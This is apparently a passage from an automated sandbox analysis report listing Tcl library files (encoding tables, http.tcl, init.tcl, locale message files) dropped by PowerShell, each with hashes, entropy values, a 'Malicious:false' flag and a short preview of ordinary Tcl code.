                                                                                                                                                                                                                      SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):42552
                                                                                                                                                                                                                      Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                      MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                      SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                      SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                      SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1111
                                                                                                                                                                                                                      Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                      MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                      SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                      SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                      SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                                                                      Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                      MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                      SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                      SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                      SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8235
                                                                                                                                                                                                                      Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                      MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                      SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                      SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                      SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10066
                                                                                                                                                                                                                      Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                      MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                      SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                      SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                      SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):746
                                                                                                                                                                                                                      Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                      MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                      SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                      SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                      SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25633
                                                                                                                                                                                                                      Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                      MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                      SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                      SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                      SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1038
                                                                                                                                                                                                                      Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                      MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                      SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                      SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                      SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                      MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                      SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                      SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                      SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2018
                                                                                                                                                                                                                      Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                      MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                      SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                      SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                      SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):265
                                                                                                                                                                                                                      Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                      MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                      SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                      SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                      SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1851
                                                                                                                                                                                                                      Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                      MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                      SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                      SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                      SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1851
                                                                                                                                                                                                                      Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                      MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                      SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                      SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                      SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1851
                                                                                                                                                                                                                      Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                      MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                      SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                      SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                      SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2157
                                                                                                                                                                                                                      Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                      MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
